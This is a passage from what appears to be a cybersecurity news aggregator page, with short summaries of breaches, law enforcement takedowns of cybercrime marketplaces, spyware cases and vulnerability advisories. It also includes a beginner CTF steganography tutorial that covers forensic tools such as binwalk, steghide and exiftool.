understanding using google, youtube and chatgpt. Stay tuned for more interesting blogs in which we will deep dive on each vulnerabilities.

by HACKLIDO

We are excited to share that CRN has named Barracuda’s Patrick O’Donnell, senior vice president of Americas sales, and Greg Saenz, vice president of channels for the Americas, to its prestigious list of 2025 Channel Chiefs.

by Barracuda

As many as 768 vulnerabilities with designated CVE identifiers were reported as exploited in the wild in 2024, up from 639 CVEs in 2023, registering a 20% increase year-over-year. Describing 2024 as ""another banner year for threat actors targeting the exploitation of vulnerabilities,"" VulnCheck said 23.6% of known exploited vulnerabilities (KEV) were known to be weaponized either on or before

by The Hacker News

An Italian investigative journalist said he was the target of a spyware attack disclosed by WhatsApp. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Welcome to the Threat Context Monthly blog series where we provide a comprehensive roundup of the most relevant cybersecurity news and threat information from KrakenLabs, Outpost24’s cyber threat intelligence team. Here’s what you need to know from January. Threat actor of the month: Funksec ransomware “Funksec ransomware” is a threat group active at least since […] The post Threat Context monthly: Executive intelligence briefing for January 2025 appeared first on Outpost24.

by Outpost24

The maintainers of the Python Package Index (PyPI) registry have announced a new feature that allows package developers to archive a project as part of efforts to improve supply chain security. ""Maintainers can now archive a project to let users know that the project is not expected to receive any more updates,"" Facundo Tuesca, senior engineer at Trail of Bits, said. In doing so, the idea is to

by The Hacker News

This week, our news radar shows that every new tech idea comes with its own challenges. A hot AI tool is under close watch, law enforcement is shutting down online spots that help cybercriminals, and teams are busy fixing software bugs that could let attackers in. From better locks on our devices to stopping sneaky tricks online, simple steps are making a big difference.  Let’s take a

by The Hacker News

Welcome to this CTF Forensics Blog Series, where we explore various forensic techniques commonly encountered in cybersecurity competitions. In Capture The Flag (CTF) challenges, forensic tasks require participants to analyze digital artifacts, uncover hidden information, and extract valuable data using specialized tools and techniques. This series will cover key forensic topics, including Steganography, Network Analysis with Wireshark, PDF Analysis, and Disk Image Forensics, providing insights into how these methods are applied in real-world scenarios. In this first installment, we’ll dive into Steganography, a fascinating technique used to embed hidden information within digital files such as images, audio, and video. By the end of this blog, you’ll have a strong understanding of steganographic methods, common CTF challenges, and the tools required to reveal hidden data. What is Steganography ? Steganography comes from the Greek words steganos (hidden) and graphein (writing), meaning “hidden writing.” It is a technique used to embed data within digital media in a way that is not immediately obvious. In CTF challenges, steganographic techniques are often used to hide flags inside images, audio files, or even within metadata. Unlike encryption, which scrambles data to protect its contents, steganography focuses on concealing the existence of the data itself. A seemingly normal image may contain a secret message hidden in its least significant bits (LSB), or an audio file might carry encoded text within its waveform. Without the right tools, these hidden messages remain undetected. Common Methods and Tools Used Strings The strings command is a simple yet powerful tool used to extract human-readable text from binary files. It scans a file for sequences of printable characters, making it useful for finding hidden messages in images, executables, and other binary files. In CTF challenges, strings is often the first tool used to check for embedded plaintext flags or hints inside a file. Common Commands: Extract all printable strings from a file: strings Image_name Filter results to search for specific keywords (e.g., “flag” ): strings Image_name | grep ""flag"" Limit output to strings of at least a certain length (e.g., 6 characters): strings -n 6 Image_name ExifTool ExifTool is a powerful metadata extraction tool that retrieves and modifies metadata from various file formats, including images, PDFs, and videos. In CTFs, metadata often contains hidden information such as author names, GPS coordinates, or even embedded messages. It’s especially useful for analyzing JPEG, PNG, and PDF files where metadata manipulation is common. Common Commands: Display all metadata from a file: exiftool file_name Search for a specific keyword in metadata (e.g., “Author”): exiftool file_name | grep ""Author"" Hex Analysis Hex analysis is essential in CTF forensics to examine the raw hexadecimal representation of files. Many times, hidden data, embedded flags, or file signatures are visible only in hex format. By analyzing a file’s hexadecimal content, you can detect anomalies, uncover hidden messages, and even recover corrupted files. Common Tools for Hex Analysis Windows HxD WinHex 010 Editor Linux (CLI-Based Hex Editors) xxd hexdump Linux (GUI-Based Hex Editors) Bless GHex These tools are mostly used by majority of people for analysis , Analysing is one of the important part where you can find some hidden data , files inside it like zip file inside it ,It is also used for Magic Bytes . Zsteg zsteg is a powerful command-line tool designed to detect steganography in PNG and BMP files. It specializes in identifying Least Significant Bit (LSB) steganography, which is a common technique used to hide data in images. zsteg scans different color channels and bit planes, revealing hidden messages that may be embedded within an image. zsteg file.png Binwalk binwalk is a powerful tool used to analyze and extract embedded data from binary files. It is commonly used in CTF forensics challenges to uncover hidden files, compressed data, firmware images, and steganographic payloads within different file types. It works by scanning a file for signatures of known file types and can extract hidden contents automatically. Analyze a file for embedded data binwalk file_name Extract hidden files automatically binwalk -e file_name Steghide Steghide is a popular command-line tool used to hide and extract data from various types of files, such as JPEG, BMP, WAV, and AU. It supports both data hiding and extraction while providing an option to encrypt the hidden data using a passphrase. This makes it particularly useful in CTF challenges where flags or other data are concealed inside multimedia files. Hide a file inside an image (or audio file) with encryption steghide embed -cf cover_image.jpg -ef secret.txt Extract hidden data from a file steghide extract -sf cover_image.jpg Check if a file contains hidden data steghide info cover_image.jpg Stegsolve Stegsolve is a Java-based tool used for analyzing images that may contain hidden information using steganographic techniques. It is particularly effective for analyzing images in which data may be concealed using methods like Least Significant Bit (LSB) manipulation. Stegsolve provides several filters and analysis modes that allow you to inspect various color channels, bit planes, and image manipulations to reveal hidden messages or patterns. Use File > Open to load image . Use the arrow to key analyse the Image. SigBits Sigbits is a tool used for analyzing the bit-level structure of files and uncovering hidden information. It is especially useful for identifying Least Significant Bit (LSB) steganography in images, as well as other types of data manipulation. Sigbits provides a convenient way to inspect and manipulate the individual bits of an image, revealing hidden messages or patterns that are embedded in the least significant bits of color channels or other parts of the file. This makes it an excellent tool for CTF challenges focused on steganography and forensics. Commonly Used Commands python sigBits.py -t=lsb -o=rgb -out=MyOutputFile -e=row MyInputFile.png python sigBits.py -t=LSB -o=BGR -e=column SomeImage.jpg python sigBits.py --type=Msb --order=GBR --extract=CoLuMn AnotherImage.png Download Link for all above mentioned Tools To get started with the tools mentioned in this blog, you can easily download and set them up from their official GitHub repositories. Each tool’s GitHub page provides clear installation instructions, including dependencies and setup steps for different operating systems. You can follow the provided tutorials to clone the repositories, compile the tools (if needed), and start using them for your forensic analysis tasks in CTF competitions. GitHub : https://github.com/Masked96Artist/Forensics-Tools-for-CTF Stay Tuned for Part - 2

by HACKLIDO

Brazilian Windows users are the target of a campaign that delivers a banking malware known as Coyote. ""Once deployed, the Coyote Banking Trojan can carry out various malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays to steal sensitive credentials,"" Fortinet FortiGuard Labs researcher Cara Lin said in an analysis published last week. The

by The Hacker News

This blog dives into the strengths and limitations of CNAPP, explaining how a CDR solution can enhance cloud security to identify and mitigate cross-domain threats.

by Darktrace

Attack surfaces are growing faster than security teams can keep up – to stay ahead, you need to know what’s exposed and where attackers are most likely to strike. With cloud adoption dramatically increasing the ease of exposing new systems and services to the internet, prioritizing threats and managing your attack surface from an attacker’s perspective has never been more important. In this

by The Hacker News

How to Escalate XSS, Ghostty 1.1.0, Elevenlabs Scraps Job Titles, Obsidian Dynamic Tables and Collaborative Editing, World''s First MIDI Shellcode, Optimize your WFH lighting.

by Hive Five

An IT pro seeks guidance on whether it’s ever acceptable to use work resources for side projects.

by ITPro Today

WhatsApp has accused professional spyware company Paragon of spying on a select group of users.

by Malwarebytes Labs

In an attack vector that''s been used before, threat actors aim to commit crypto fraud by hijacking highly followed users, thus reaching a broad audience of secondary victims.

by Dark Reading

2025-02-03 15:43:00

Black Hat USA

by Dark Reading

The company is retiring the VPN tool while raising prices for Microsoft 365 Personal and Family subscriptions.

by ZDNET Security

By migrating from costly, outdated legacy systems to cloud-based solutions, healthcare organizations will experience improved scalability, security, and efficiency.

by ITPro Today

The hack has the potential to be one of the biggest of the year, but the edtech giant is refusing to answer important questions © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The release of a new Apple AirTag appears imminent for multiple reasons. Here''s what we know and when you can expect it.

by ZDNET Security

2025-02-03 15:07:16

Sophos Acquires Secureworks

Transforming the future, together

by Sophos News

By integrating security into CI/CD, applying automated policies, and supporting developers with the right processes and tools, infosec teams can increase efficiency and build secure software.

by Dark Reading

For the latest discoveries in cyber research for the week of 3rd February, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Mizuno USA, giant sports equipment manufacturer, has confirmed a cyber-attack that resulted in the theft of personal information from its network between August and October 2024. The data breach included names, Social […] The post 3rd February – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

Media and journalism companies can now build end-to-end workflows that support Content Credentials by using Cloudflare Images.

by Cloudflare

The modern corporate landscape is marked by rapid digital change, heightened cybersecurity threats and an evolving regulatory environment. At the nexus of these pressures sits the chief information security officer (CISO), a role that has gained newfound influence and responsibility. The recent Deloitte Global Future of Cyber Survey underscores this shift, revealing that “being more […] The post CISOs drive the intersection between cyber maturity and business continuity appeared first on Security Intelligence.

by Security Intelligence

Attackers are distributing the Tria stealer under the guise of wedding invitations.

by Kaspersky

Check out the January updates in Compliance Plus so you can stay on top of featured compliance training content.

by KnowBe4

French startup Riot has raised a $30 million Series B round after reaching $10 million in annual revenue in 2024. Originally focused on educating employees about cybersecurity risks, the company now wants to go one step further and nudge employees so that they minimize their attack surface. Left Lane Capital is leading Monday’s round with […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Ransomware, data theft, intrusions into critical infrastructures: attacks are on the increase in Switzerland, affecting SMEs and large organizations alike. The post ZENDATA to the rescue of hacker victims – TDG appeared first on ZENDATA Cybersecurity.

by Zendata

A Russian-speaking cybercrime gang known as Crazy Evil has been linked to over 10 active social media scams that leverage a wide range of tailored lures to deceive victims and trick them into installing malware such as StealC, Atomic macOS Stealer (aka AMOS), and Angel Drainer. ""Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil employs a

by The Hacker News

The deal comes amid a flurry of recent merger and acquisition deals in the cybersecurity sector.

by Cybersecurity Dive

Threat actors are exploiting known weak points and enterprises’ dependency across the tech stack. It’s making cybersecurity professionals’ jobs harder than ever before. 

by Cybersecurity Dive

Understanding cybersecurity can sometimes feel like steering a maze of technical terms and complex systems. But a recent infographic shared by @yanabantai on X (formerly Twitter) has made it simpler, offering a fresh perspective by comparing cybersecurity to the human body This cybersecurity infographic doesn’t just break down heavy technical jargon—it brings the security world to life by drawing parallelisms between digital protection and vital human organs. The Human Body of Cybersecurity Here’s how the infographic cleverly outlines each critical component: The Brain: Security Operations Center (SOC) Much like how the brain controls our actions and decisions, the SOC acts as the command center of cybersecurity, constantly monitoring, analyzing, and responding to threats in real time. The Eyes and Ears: SIEM Systems Security Information and Event Management (SIEM) systems function as the eyes and ears, scanning the network for irregularities and spotting potential threats early, before they can escalate. The Heart: Data Encryption Data encryption is the heart of cybersecurity, ensuring secure communication by protecting sensitive information during its transmission and storage, keeping everything alive and functional. The Nervous System: Intrusion Detection System (IDS) Just as the nervous system reacts to potential threats in the body, the IDS alerts and activates responses when suspicious activity is detected, keeping the system on high alert. The Bones: Infrastructure Like bones provide structure to the body, cybersecurity infrastructure supports and stabilizes the entire system, ensuring it’s resilient and robust against cyberattacks. The Liver: Security Policies Security policies work like the liver, detoxifying the network. By enforcing protocols and safe practices, they filter out harmful activities and keep the system healthy. The Kidneys: Filtering Systems Just as kidneys filter waste in the body, filtering systems protect sensitive data by preventing unauthorized access, ensuring only safe and clean data enters the network. The Blood: Data Flow Data flow is the circulation of information, much like how blood carries oxygen throughout the body. It keeps the system running smoothly and operational. The Immune System: Antivirus Software Antivirus software is the body’s immune system, fighting off infections and malicious software before it can harm the network. The Skin: Firewall The firewall acts as the skin, the first line of defense against external threats. It shields the network, blocking unauthorized access and potential harm. [caption id=""attachment_100751"" align=""aligncenter"" width=""724""] Source: Bantai (X)[/caption] Why This Cybersecurity Infographic Matters This clever analogy simplifies the complexities of cybersecurity while emphasizing the importance of a holistic approach. Just as each organ in the human body plays a vital role in maintaining health, every component in cybersecurity is essential for safeguarding digital systems. The cybersecurity infographic has generated widespread interest, with many praising its ability to make a technical subject more accessible. Next time you hear about firewalls or encryption, remember—cybersecurity is a lot like the human body: strong, resilient, and always working behind the scenes to keep us safe.

by The Cyber Express

This article discusses your options for B2B lead enrichment, touching on LinkedIn''s limitations as a data source but ultimately showing why web-based data—like Hunter''s—will improve your lead segmentation.

by The Hunter Blog

The Justice Department made a new move in disrupting an international network of cybercriminals by announcing the coordinated seizure of 39 cybercrime websites. These websites, associated with a Pakistan-based operation called the HeartSender, were used to sell hacking tools and fraud-enabling resources to transnational organized crime groups. The action was carried out in collaboration with the Dutch National Police.  The websites seized in this operation were linked to a group headed by Saim Raza, also known by the moniker HeartSender. Raza’s network has been active since at least 2020, providing malicious software and phishing toolkits that allowed cybercriminals to target victims, primarily in the United States. The group’s activities led to over $3 million in victim losses, and this seizure marks an important step in disrupting their operations.  The Cybercrime Websites and Tools Sold by the HeartSender Network  The cybercrime websites operated by Saim Raza served as marketplaces for various hacking tools, including phishing kits, scam pages, and email extractors. These resources are essential for launching and maintaining fraudulent schemes, particularly business email compromise (BEC) attacks, which have become a major source of financial losses globally. The tools offered by Raza''s network allowed cybercriminals to impersonate legitimate businesses and trick victims into transferring funds to accounts controlled by the perpetrators.  [caption id=""attachment_100744"" align=""alignnone"" width=""720""] Authorities Seizing the Websites (Source: justice.gov)[/caption] The websites not only provided the tools themselves but also offered training. Raza’s network took a unique approach by linking instructional YouTube videos, which demonstrated how to carry out various fraudulent activities using the tools. This effort made it easier for individuals with little to no technical expertise to execute complex scams. Cybercrime websites marketed these tools as ""fully undetectable"" by common antispam and security software, which made them highly appealing to cybercriminals looking to avoid detection. Targeting Transnational Organized Crime Groups  The primary customers of these tools were transnational organized crime groups, who used them to facilitate a range of cybercrimes. A common scheme was business email compromise (BEC), where cybercriminals impersonate employees or vendors of a company to trick the organization into wiring large sums of money to fraudulent accounts. This type of attack often targets companies in the United States, resulting in severe financial losses.  In addition to BEC, the tools sold through these cybercrime websites were also used for identity theft, credential harvesting, and other forms of fraud. These activities have a devastating impact on victims, both financially and in terms of reputational damage. The Justice Department''s efforts to seize these domains aim to disrupt the flow of these tools and prevent further damage from being caused by Raza''s operation.  The Role of Law Enforcement in the Seizure  The successful seizure of these cybercrime websites was the result of close coordination between multiple law enforcement agencies. Supervisory Official Antoinette T. Bacon from the Justice Department’s Criminal Division, along with U.S. Attorney Nicholas J. Ganjei from the Southern District of Texas and Special Agent in Charge Douglas Williams from the FBI Houston Field Office, announced the operation. Their collective efforts underscore the importance of international collaboration in tackling cybercrime, as Raza’s network operated on a global scale.  The case is currently under investigation by the FBI Houston Field Office, with support from Dutch law enforcement agencies. The Justice Department expressed appreciation for the assistance provided by their Dutch counterparts, whose help was instrumental in executing this operation. Trial Attorney Gaelin Bernstein of the Criminal Division’s Computer Crime and Intellectual Property Section, along with Assistant U.S. Attorney Rodolfo Ramirez for the Southern District of Texas, are overseeing the prosecution of the case.  Impact and Ongoing Efforts  The seizure of 39 domains associated with HeartSender’s network is a major blow to the operation, but the Justice Department and its partners are committed to continuing their efforts to dismantle cybercrime networks. These websites were not only sources of hacking tools but also platforms for promoting and enabling widespread criminal activity. By disrupting these operations, the Justice Department aims to prevent further harm and send a clear message to those involved in cybercrime that their activities will not go unchecked.  As cybercrime continues to evolve, law enforcement agencies around the world must stay vigilant and collaborate across borders. The tools used by groups like HeartSender highlight the growing sophistication of cybercriminals, but also the growing resolve of law enforcement to combat these threats. The recent seizure is just one part of the larger effort to curb the rise of hacking tools and protect victims from cybercrime. 

by The Cyber Express

A list of topics we covered in the week of January 27 to February 2 of 2025

by Malwarebytes Labs

Welcome to Picus Security''s monthly cyber threat intelligence roundup! 

by Picus Security

Authorities have successfully disrupted and dismantled the notorious online cybercrime marketplaces known as Cracked and Nulled, which had been operating since 2016. The Justice Department’s involvement in this effort was part of the larger Operation Talent, a multinational initiative aimed at targeting these criminal platforms that trafficked in stolen login credentials, hacking tools, and various other illicit products.   The operation spanned across several countries, including the United States, Romania, Australia, France, Germany, Spain, Italy, and Greece. This law enforcement operation, which has led to widespread seizures of servers and domain names associated with these marketplaces, is expected to disrupt the illicit trade that has victimized millions of individuals. It is believed that at least 17 million people in the United States alone were impacted by the cybercrimes linked to these platforms.  Cracked and Nulled: A Hotbed of Cybercrime Activity  One of the primary targets of Operation Talent was Cracked, an online marketplace that had been operational since March 2018. Cracked had more than 4 million users and was involved in selling stolen login credentials, hacking tools, malware hosting services, and other cybercrime products. [caption id=""attachment_100734"" align=""alignnone"" width=""930""] Operation Talent Seizure Banner (Source: justice.gov)[/caption] Over 28 million posts were listed on the platform, with content ranging from illegal tools to sensitive stolen information. According to reports, Cracked generated approximately $4 million in revenue during its operation, primarily by trafficking in stolen data that allowed cybercriminals to launch fraudulent schemes.  A particularly disturbing example of how Cracked was used involved a case of cyberstalking and sextortion in the Western District of New York. A criminal accessed a victim’s personal credentials using a product advertised on the platform, which claimed to offer access to “billions of leaked websites.” This allowed the criminal to send sexually explicit and threatening messages to the victim, demonstrating just one of the numerous harmful applications of the Cracked marketplace’s offerings.  To mitigate such incidents, the FBI, in cooperation with international law enforcement partners, identified and seized servers and domain names associated with the Cracked infrastructure. This operation, including the takedown of servers used for payment processing through Sellix and related hosting services, was a direct hit at the heart of the platform’s operations. Law enforcement officials now expect that anyone trying to access the seized domains will encounter a law enforcement seizure banner, alerting them to the legal actions taken.  Nulled Marketplace: A Parallel Operation  Simultaneously, the U.S. Justice Department also announced the seizure of the Nulled marketplace domain and revealed criminal charges against Lucas Sohn, one of its key administrators. Nulled had been active since 2016, with over 5 million users and more than 43 million posts related to cybercrime products and services. Similar to Cracked, the platform was responsible for selling stolen login credentials, personal identification documents, and hacking tools. The marketplace reportedly generated around $1 million annually, enabling criminals to further their activities with ease.  A particularly concerning item that was sold through Nulled was a database containing the names and social security numbers of 500,000 U.S. citizens, highlighting the scale of identity theft facilitated by the platform. Lucas Sohn, a 29-year-old Argentinian residing in Spain, acted as a key administrator for Nulled, processing transactions and acting as an intermediary for users engaged in cybercrime activities. Sohn faces several charges, including conspiracy to traffic in passwords, identity fraud, and access device fraud. If convicted, he could face lengthy prison sentences. The Global Nature of the Cybercrime Threat  This operation exemplifies the collaborative efforts between international law enforcement agencies in addressing the growing issue of cybercrime. Investigators from multiple countries, including the Australian Federal Police, France’s Anti-Cybercrime Office, Germany’s Federal Criminal Police Office, and the Spanish National Police, among others, joined forces with the FBI to disrupt the Cracked and Nulled marketplaces.  With the seizures of critical cybercrime infrastructure and the arrests of key figures involved in these online marketplaces, authorities have taken a step toward curbing the global trade in stolen data and hacking tools. The operation not only highlights the widespread use of such platforms in criminal enterprises but also demonstrates the ongoing international commitment to combat online cybercrime.  The Justice Department, along with its law enforcement partners, has sent a clear message to cybercriminals operating in the dark corners of the internet: they are not beyond reach. The takedown of Cracked and Nulled serves as a powerful reminder of the risks associated with engaging in illegal activities within online cybercrime marketplaces. With the help of operations like Operation Talent, authorities are sending a warning to others who may attempt to exploit similar platforms for criminal purposes. 

by The Cyber Express

This vulnerability allows local attackers to escalate privileges on affected installations of TeamViewer. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-0065.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of NI Vision Builder AI. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12740.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of NI Vision Development Module. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12740.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of NI Vision Builder AI. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12740.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of NI Vision Development Module. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12740.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.7. The following CVEs are assigned: CVE-2024-9632.

by Zero Day Initiative Advisories

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Introduction to PowerShell Regex A regular expression (regex) is a sequence of characters that defines a pattern or template, such as the format of email addresses or Social Security numbers. Regular expressions are useful for pattern matching and text manipulation. For example, regex can help you quickly find all failed login attempts in a server … Continued

by Netwrix

The Red Siege train is heading to Denver, Colorado, for the first-ever Wild West Hackin’ Fest @ Mile High from February 5-7, 2025! If you’re a cybersecurity professional who loves […]

by Red Siege Blog

U.S. senator says Musk''s access to Treasury systems represents a ""national security risk."" © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

U.S. and Dutch law enforcement agencies have announced that they have dismantled 39 domains and their associated servers as part of efforts to disrupt a network of online marketplaces originating from Pakistan. The action, which took place on January 29, 2025, has been codenamed Operation Heart Blocker. The vast array of sites in question peddled phishing toolkits and fraud-enabling tools and

by The Hacker News

BeyondTrust has revealed it completed an investigation into a recent cybersecurity incident that targeted some of the company''s Remote Support SaaS instances by making use of a compromised API key. The company said the breach involved 17 Remote Support SaaS customers and that the API key was used to enable unauthorized access by resetting local application passwords. The breach was first flagged

by The Hacker News

Plus: WhatsApp discloses nearly 100 targets of spyware, hackers used the AT&T breach to hunt for details on US politicians, and more.

by WIRED Security News

Meta-owned WhatsApp on Friday said it disrupted a campaign that involved the use of spyware to target journalists and civil society members. The campaign, which targeted around 90 members, involved the use of spyware from an Israeli company known as Paragon Solutions. The attackers were neutralized in December 2024. In a statement to The Guardian, the encrypted messaging app said it has reached

by The Hacker News

Cybersecurity researchers have discovered a malvertising campaign that''s targeting Microsoft advertisers with bogus Google ads that aim to take them to phishing pages that are capable of harvesting their credentials. ""These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft''s advertising platform,"" Jérôme Segura, senior

by The Hacker News

Social engineering methods are being put to the test to distribute malware.

by Malwarebytes Labs

Now we know exactly how DeepSeek was designed to work, and we may even have a clue toward its highly publicized scandal with OpenAI.

by Dark Reading

Check out all the highlights from Black Hat USA 2024 at the Mandalay Bay in Las Vegas. #cybersecurity #infosec #blackhat

by Dark Reading

The CHC remains operational, but a host of personal data is now in the hands of a "skilled cybercriminal," it said.

by Dark Reading

The "Cracked" and "Nulled" Dark Web sites are now offline, along with the Pakistani "Saim Raza" network of underground forums (aka HeartSender).

by Dark Reading

In one security firm''s test, the chatbot alluded to using OpenAI''s training data.

by ZDNET Security

Cyble dark web researchers have identified a new pro-Russian hacktivist group that’s been hacking into oil and gas facility control panels in the U.S. Cyble detailed two claims by the new “Sector 16” group that members hacked into control panels in energy facilities and tampered with system control settings. The new Russian threat group has been working with another pro-Russian group – Z-Pentest – which has been hacking into critical water and energy infrastructure since last year. Dramatic Videos Detail Control Panel Hacks Like Z-Pentest, Sector 16 has been posting screen recordings of its exploits to underground forums and channels, continuing a trend of Russian hacktivists posting videos of their members tampering with critical infrastructure control panels. Cyble speculated that that the videos may be “more to establish credibility or threaten than to inflict actual damage, although in one case Z-Pentest claimed to disrupt a U.S. oil well system.” In one incident, Sector 16 teamed with Z-Pentest to hack into a supervisory control and data acquisition (SCADA) system managing oil pumps and storage tanks in Texas. The groups posted a video showing the system interface, including real-time data on tank levels, pump pressures, casing pressures, and alarm management features. The logos of both groups were embedded into the video, suggesting a close alliance between the two groups, Cyble said (image below). [caption id=""attachment_100714"" align=""aligncenter"" width=""450""] Sector 16 and Z-Pentest control panel hack (Cyble)[/caption] Sector 16 later claimed sole responsibility for hacking into the control systems of a U.S. oil and gas production facility, and released a video “purportedly demonstrating their access to the facility''s operational data and systems,” Cyble said. The video showed “control interfaces associated with the monitoring and management of critical infrastructure,” the Cyble report said. The system controls included shutdown management, production monitoring, tank level readings, gas lift operations, and Lease Automatic Custody Transfer (LACT) data, “all critical components in the facility''s operations. Additionally, they were also able to access valve control interfaces, pressure monitoring, and flow measurement data, highlighting the potential extent of access.” U.S. cybersecurity officials have been concerned about critical infrastructure threats from adversaries like Russia and China, but critical sectors like energy, healthcare and transportation remain vulnerable to attack. Pro-Islamic Groups Launch DDoS Attacks on U.S. Government Cyble also examined claims of DDoS attacks on the U.S. government by pro-Islamic hacktivists like Mr. Hamza, which united with Z-Pentest and other pro-Russian groups in European attacks in December. Mr. Hamza teamed with Velvet Team in DDoS attacks on U.S. government and military platforms, Cyble said, noting that targeted systems included a U.S. Army development and communications network, an FBI portal for bank robbery information, and the United States Africa Command''s official platform. Such motivated threat groups – willing to work across ideological lines to advance their goals – poses substantial risks to critical infrastructure in dire need of stronger cybersecurity protections. The Cyble dark web report also detailed recent ransomware and data breach claims made by threat actors.

by The Cyber Express

Regulators are ready to enforce new state data privacy laws. Here''s how experts say organizations can stay compliant and avoid penalties.

by Dark Reading

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Food and Drug Administration (FDA) have issued alerts about the presence of hidden functionality in Contec CMS8000 patient monitors and Epsimed MN-120 patient monitors. The vulnerability, tracked as CVE-2025-0626, carries a CVSS v4 score of 7.7 on a scale of 10.0. The flaw, alongside two other issues, was reported to CISA

by The Hacker News

The FBI and authorities in The Netherlands this week seized a number of servers and domains for a hugely popular spam and malware dissemination service operating out of Pakistan. The proprietors of the service, who use the collective nickname ""The Manipulaters,"" have been the subject of three stories published here since 2015. The FBI said the main clientele are organized crime groups that try to trick victim companies into making payments to a third party.

by Krebs on Security

The deal, expected to close this quarter, will give Tenable One Exposure Management much-needed integration with over 100 third-party security tools and platforms.

by Dark Reading

Security researchers tested 50 well-known jailbreaks against DeepSeek’s popular new AI chatbot. It didn’t stop a single one.

by WIRED Security News

Nine application security toolmakers band together to fork the popular Semgrep code-scanning project, touching off a controversy over access to features and fairness.

by Dark Reading

The biggest and most high-profile ransomware incidents of 2024, and the consequences for targeted organizations.

by Kaspersky

Securing sprawling web application and API environments can be a constant game of whack-a-mole. To know and control their realistic attack surface, security teams need a way to find and test everything that’s running—and do it consistently, as often as they need. That’s why a DAST-based application security platform is fast becoming the CISO’s tool of choice. The post Is DAST only for web applications? A fact-check on vulnerability scanning appeared first on Invicti.

by Invicti

As part of our ongoing mission to identify emerging threats to mobile security, our zLabs team shares how we can help protect you against Tria Stealer. The post Zimperium’s Protection Against Tria Stealer’s SMS Data Theft appeared first on Zimperium.

by Zimperium

Law enforcement took down several cybercrime forums that sold tools and data to other cybercriminals

by Malwarebytes Labs

Russia has a long history of targeted platforms, and aimed its restrictions on the most popular video-sharing platform in the country The post How Russia throttled YouTube for domestic audiences appeared first on DFRLab.

by DFRLab

Social engineering has long been an effective tactic because of how it focuses on human vulnerabilities. There’s no brute-force ‘spray and pray’ password guessing. No scouring systems for unpatched software. Instead, it simply relies on manipulating emotions such as trust, fear, and respect for authority, usually with the goal of gaining access to sensitive information or protected systems.

by The Hacker News

In recognition of Change Your Password Day, Keeper Security is urging organisations to prioritise securing credentials to combat the escalating threat of cyber attacks. Without proper safeguards, compromised credentials can lead to devastating breaches, financial loss and reputational damage. Privileged accounts, often used by administrators or automated systems to access critical infrastructure, are prime targets for […] The post Change Your Password Day: Keeper Security Highlights Urgent Need for Strong Credential Management appeared first on IT Security Guru.

by IT Security Guru

Italy''s data protection watchdog has blocked Chinese artificial intelligence (AI) firm DeepSeek''s service within the country, citing a lack of information on its use of users'' personal data. The development comes days after the authority, the Garante, sent a series of questions to DeepSeek, asking about its data handling practices and where it obtained its training data. In particular, it wanted

by The Hacker News

Google said it blocked over 2.36 million policy-violating Android apps from being published to the Google Play app marketplace in 2024 and banned more than 158,000 bad developer accounts that attempted to publish such harmful apps. The tech giant also noted it prevented 1.3 million apps from getting excessive or unnecessary access to sensitive user data during the time period by working with

by The Hacker News

Hackers are increasingly abusing bugs in popular enterprise software to target big companies in mass-hacking campaigns © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Did you know that 48% of the digital identities you are managing belong to individuals external to your organisation, such as partners or suppliers? As businesses rely more on networks of third-party partners, managing their access needs becomes essential. Allowing partners to access company resources introduces complexities and risks, making it vital for security leaders […] The post Third-party Delegation: Striking the Balance Between Risk, Trust, and Control appeared first on IT Security Guru.

by IT Security Guru

Organizations struggle with unpredictable cloud spending, but improved data visibility, cost management, and long-term forecasting can turn cloud financials into a strategic asset for optimizing IT investments.

by ITPro Today

India''s Tata Technologies has disclosed a ransomware attack affecting its IT assets. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The Meta-owned company said the campaign was linked to Israeli spyware maker Paragon. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The Cyber Trust Mark has the potential to change how we define and measure security at the endpoint level. But potential isn''t enough.

by Dark Reading

“A computer can never be held accountable, therefore a computer must never make a management decision.” – IBM Training Manual, 1979 Artificial intelligence (AI) adoption is on the rise. According to the IBM Global AI Adoption Index 2023, 42% of enterprises have actively deployed AI, and 40% are experimenting with the technology. Of those using […] The post AI decision-making: Where do businesses draw the line? appeared first on Security Intelligence.

by Security Intelligence

This glossary includes the most common terms and expressions TechCrunch uses in our security reporting, and explanations of how — and why — we use them. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Ever wondered if your organization is truly secure or if your teams are just crossing items off a checklist? A Security Posture Review (SPR) is a solid way to answer […]

by Red Siege Blog

